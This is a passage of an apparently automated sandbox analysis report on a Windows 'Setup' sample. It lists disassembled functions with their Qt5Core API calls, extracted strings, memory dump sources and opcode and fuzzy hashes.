                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975406
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1975428
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1975436
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ?append@QListData@@QEAAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975457
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1977E48
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1977E56
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteData@@ListV0@@$?begin@$?append@?detach_grow@?end@Data@1@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 724226085-0
                                                                                                                                                              • Opcode ID: 11e5e86277d24d832acad93c6802589d2c2bfb6a3842c7a8af19e8efa8dc27ca
                                                                                                                                                              • Instruction ID: ef4ec618f40f6091c8f173c03ae45542529bca7216c4c4be85e20ce17bca319e
                                                                                                                                                              • Opcode Fuzzy Hash: 11e5e86277d24d832acad93c6802589d2c2bfb6a3842c7a8af19e8efa8dc27ca
                                                                                                                                                              • Instruction Fuzzy Hash: 6A519072B09B4282EB519B22E8440A9B365FF85FE4F848532DE5D0B768DF7CD155CB00
                                                                                                                                                              Function 00007FFBA19DEFA0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 115COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$String@@@$Variant@@$Latin1
                                                                                                                                                              • String ID: ActiveConfiguration$UserChoiceConfiguration
                                                                                                                                                              • API String ID: 3206264438-461075109
                                                                                                                                                              • Opcode ID: a3389219310e093d20595fb3c9280a4943df60c67e5834cb3b98c434d9789898
                                                                                                                                                              • Instruction ID: a53e37aa8f8f8c13a6dd0ab3ac3f27fe58055571953c3310f6b52f21e6065f4e
                                                                                                                                                              • Opcode Fuzzy Hash: a3389219310e093d20595fb3c9280a4943df60c67e5834cb3b98c434d9789898
                                                                                                                                                              • Instruction Fuzzy Hash: 8A4184A6A0D74182EB91CB35F441279A760FF89B98F580132DE9D47795EF2CD586CF00
                                                                                                                                                              Function 00007FFBA1973AE0 Relevance: 21.1, APIs: 14, Instructions: 113COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@ByteV0@@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2885984698-0
                                                                                                                                                              • Opcode ID: 57b2e20a9f4ca98089972a9dd8bd0c6e9cfd79241fb3f0d3d3f82635cf228618
                                                                                                                                                              • Instruction ID: 3b1b1546f84216cf1ad338e96f16351558901cdf705a6be0dace110bdf4ade02
                                                                                                                                                              • Opcode Fuzzy Hash: 57b2e20a9f4ca98089972a9dd8bd0c6e9cfd79241fb3f0d3d3f82635cf228618
                                                                                                                                                              • Instruction Fuzzy Hash: 80419C72B0AB4286DB618F22E8401B9B365FF85BA5F884132DE5E17764DF3CE146CB04
                                                                                                                                                              Function 00007FFBA1984910 Relevance: 21.1, APIs: 14, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@ByteV0@@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2885984698-0
                                                                                                                                                              • Opcode ID: 9a0436d657abe1b08d29fad3b82c5d6ffcf533112e1db6aa2d0311267c025570
                                                                                                                                                              • Instruction ID: 6432278f42db735c4375646a0dc7ad990ef277e92f18ff79cce78d8c51b7e7e5
                                                                                                                                                              • Opcode Fuzzy Hash: 9a0436d657abe1b08d29fad3b82c5d6ffcf533112e1db6aa2d0311267c025570
                                                                                                                                                              • Instruction Fuzzy Hash: CF416D72B0AA4286DB619F21E8441B9B361FF85FA5F484132DE5E0B764EF3CE445CB00
                                                                                                                                                              Function 00007FFBA1974D00 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 108COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA1974DB2
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA1974DCC
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA1974DE6
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA1974E00
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?disconnect@D01@Object@@
                                                                                                                                                              • String ID: 1_q_networkSessionClosed()$1_q_networkSessionFailed(QNetworkSession::SessionError)$1_q_networkSessionStateChanged(QNetworkSession::State)$2closed()$2error(QNetworkSession::SessionError)$2networkSessionConnected()$2opened()$2stateChanged(QNetworkSession::State)
                                                                                                                                                              • API String ID: 3920890631-3007809043
                                                                                                                                                              • Opcode ID: 12bbc768be35cb8066271b79d8ed2524f40bc48ea1321ce96f19b5fc11e34041
                                                                                                                                                              • Instruction ID: d1a3562763aac69756c960be1c25ad087e3ed8fc89ca13b3d8150d6b9f2359cb
                                                                                                                                                              • Opcode Fuzzy Hash: 12bbc768be35cb8066271b79d8ed2524f40bc48ea1321ce96f19b5fc11e34041
                                                                                                                                                              • Instruction Fuzzy Hash: AE517BB6A0EA4186EB928F35E40026C7360FF84BA8F884532DE5D4B755DF3CE546CB50
                                                                                                                                                              Function 00007FFBA197FBC0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 67COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Variant@@$Url@@$Char@@@Data@@FormattingHash$?allocate?arg@?translate@?willApplication@@Char@@ComponentCoreFlags@Grow@Latin1Node@Option@Option@2@@@@String@V0@@Valid@
                                                                                                                                                              • String ID: Error opening %1$QNetworkAccessCacheBackend
                                                                                                                                                              • API String ID: 63760815-565378317
                                                                                                                                                              • Opcode ID: 81a6cb035fdc14a218234d7af0978323b3b54382abb98f14017f1fcf7b6efcd6
                                                                                                                                                              • Instruction ID: 6b786ec4d93ea76e2a94bbc8ec59917a7c7604c058175e96c3ba915d896bff13
                                                                                                                                                              • Opcode Fuzzy Hash: 81a6cb035fdc14a218234d7af0978323b3b54382abb98f14017f1fcf7b6efcd6
                                                                                                                                                              • Instruction Fuzzy Hash: C93195A1A1D69282EB91DB21F4511F96361FF84BA4F804032DD9F47A64EF7CD18ACF10
                                                                                                                                                              Function 00007FFBA197BB20 Relevance: 19.7, APIs: 13, Instructions: 163timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@Hash$?free_helper@Node@1@@$Node@1@$?detach_helper@$Node@$?clear@?first?next?stop@Array@@BasicByteTimer@@U21@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4263578371-0
                                                                                                                                                              • Opcode ID: bf60cc61233aaac94a33013f5df002537640ea239305ed16e85334faee5054a1
                                                                                                                                                              • Instruction ID: fb3623950976e36bbc22bea17dfad1308a67e24f2f8a48bbf398d9e857d6ed9c
                                                                                                                                                              • Opcode Fuzzy Hash: bf60cc61233aaac94a33013f5df002537640ea239305ed16e85334faee5054a1
                                                                                                                                                              • Instruction Fuzzy Hash: CF713BB1A0AB5686E7918B35EA4016973A0FF44BA8F840436DE5E83654DFBCE446CF50
                                                                                                                                                              Function 00007FFBA1A3D120 Relevance: 19.7, APIs: 13, Instructions: 162COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$String@@$?data@?dispose@?size@Char@@Data@1@@$?append@?detach_grow@?end@Data@1@Locker@@Mutex
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3931562247-0
                                                                                                                                                              • Opcode ID: 660d62944f6d8fde6f9784eda0aac9ca83d54d43f435545db0accc9a829ffefc
                                                                                                                                                              • Instruction ID: 087e49b987998ac5de80f91bcda1772de4603555f4f9e88c7b3922b011687838
                                                                                                                                                              • Opcode Fuzzy Hash: 660d62944f6d8fde6f9784eda0aac9ca83d54d43f435545db0accc9a829ffefc
                                                                                                                                                              • Instruction Fuzzy Hash: 9061BFB6B0AA4282DFA29B35E8502BA6361FF81BA5F844532DD6E07755EF3CD445CF00
                                                                                                                                                              Function 00007FFBA1983B90 Relevance: 19.7, APIs: 13, Instructions: 152COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,?,00007FFBA1984490,?,?,?,?,?,?,?,00007FFBA19845BD), ref: 00007FFBA1983BC6
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983BD3
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983BDF
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983C16
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983C36
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983C77
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983C84
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983CB7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983CC7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983CE1
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983CFA
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983D0A
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1983D29
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?nextData@@HashNode@Node@1@U21@@$V0@@Variant@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3767166643-0
                                                                                                                                                              • Opcode ID: ad98c6eecb9ee1fd04a8e5c978fa9a86e3ba56a70daff592a4b1caa25bbad96a
                                                                                                                                                              • Instruction ID: f684809647348d1c1e922ac50dc94656f45847253d39a278d645e59064797b61
                                                                                                                                                              • Opcode Fuzzy Hash: ad98c6eecb9ee1fd04a8e5c978fa9a86e3ba56a70daff592a4b1caa25bbad96a
                                                                                                                                                              • Instruction Fuzzy Hash: 695171A1B0B75686EF929F33E5001B963A8BB45BA8F484432CD1E07754EE7CE597CB04
                                                                                                                                                              Function 00007FFBA19E6BC0 Relevance: 19.7, APIs: 13, Instructions: 151COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6BF6
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6C03
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6C0F
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6C46
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6C66
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6CA7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6CB4
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6CE7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6CF7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6D11
                                                                                                                                                              • ??8QVariant@@QEBA_NAEBV0@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6D2A
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6D3A
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,00000000,00007FFBA19E739A), ref: 00007FFBA19E6D59
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?nextData@@HashNode@Node@1@U21@@$V0@@Variant@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3767166643-0
                                                                                                                                                              • Opcode ID: c28fc3219e4b3544a0e569a618e23b9618007193c1aeaec57ab7ae5c698e9b4d
                                                                                                                                                              • Instruction ID: ea3dfcefe71229e421792dea648b36859cd8e33072e9ed1da28943febba3a4b6
                                                                                                                                                              • Opcode Fuzzy Hash: c28fc3219e4b3544a0e569a618e23b9618007193c1aeaec57ab7ae5c698e9b4d
                                                                                                                                                              • Instruction Fuzzy Hash: 7A515EB1A0B75685EF92DB22E90417957A4FB55BA8F880431CE0E07794EE7DE4D7CB00
                                                                                                                                                              Function 00007FFBA1986DF0 Relevance: 19.6, APIs: 13, Instructions: 144COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@$List$Array@@Byte$?begin@$?end@?free_helper@HashNode@1@@V0@@$?detach@?dispose@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3972227432-0
                                                                                                                                                              • Opcode ID: 54f1315e859e4faa892255347accfa2a6b2713dd9733f87fc4beb4f8ccc412d3
                                                                                                                                                              • Instruction ID: ce19358116c1bcdfcd270e8eb31f97e1c9ceaed19fcf75be88ea17d527848bc6
                                                                                                                                                              • Opcode Fuzzy Hash: 54f1315e859e4faa892255347accfa2a6b2713dd9733f87fc4beb4f8ccc412d3
                                                                                                                                                              • Instruction Fuzzy Hash: 155171B6A0AB4286EF91DF25E84017863A1FB84BA4F484436DE5D4B754EF7CE456CF00
                                                                                                                                                              Function 00007FFBA19F6CA0 Relevance: 19.6, APIs: 13, Instructions: 110timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6CDF
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6CED
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6CFB
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6D09
                                                                                                                                                                • Part of subcall function 00007FFBA19B4E30: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA19B4EFA
                                                                                                                                                                • Part of subcall function 00007FFBA19B4E30: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA19B4F2A
                                                                                                                                                                • Part of subcall function 00007FFBA19B4E30: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA19B4F7D
